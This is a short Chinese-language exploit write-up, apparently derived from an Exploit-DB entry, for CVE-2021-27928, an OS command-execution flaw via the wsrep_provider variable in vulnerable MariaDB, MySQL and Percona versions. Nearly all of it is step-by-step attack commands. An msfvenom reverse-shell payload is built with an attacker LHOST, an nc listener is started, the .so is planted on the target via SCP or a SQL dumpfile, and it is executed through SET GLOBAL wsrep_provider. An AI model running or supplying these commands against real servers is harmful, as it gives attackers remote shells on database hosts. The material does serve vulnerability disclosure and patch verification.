漏洞标题:MariaDB 10.2 /MySQL - 'wsrep_provider' 操作系统命令执行
日期:2021年3月18日
漏洞作者:Central InfoSec
受影响版本:
MariaDB 10.2 版本低于 10.2.37
10.3 版本低于 10.3.28
10.4 版本低于 10.4.18
10.5 版本低于 10.5.9
Percona Server 截至 2021-03-03;以及用于 MySQL 的 wsrep 补丁截至 2021-03-03
测试环境:Linux
CVE 编号:CVE-2021-27928
步骤1:创建反弹Shell载荷
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

步骤2:启动监听器
nc -lnvp <port>

步骤3:将载荷复制到目标机器
通过SCP
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so
通过Dumpfile
python3 -c 'print(open("CVE-2021-27928.so", "rb").read().hex())'
mysql -u <user> -p -h <ip>
SELECT UNHEX('PYTHON_OUTPUT') into dumpfile '/tmp/CVE-2021-27928.so';
步骤4:执行载荷
mysql -u <user> -p -h <ip>
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

https://www.exploit-db.com/exploits/49765
https://jira.mariadb.org/browse/MDEV-25179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27928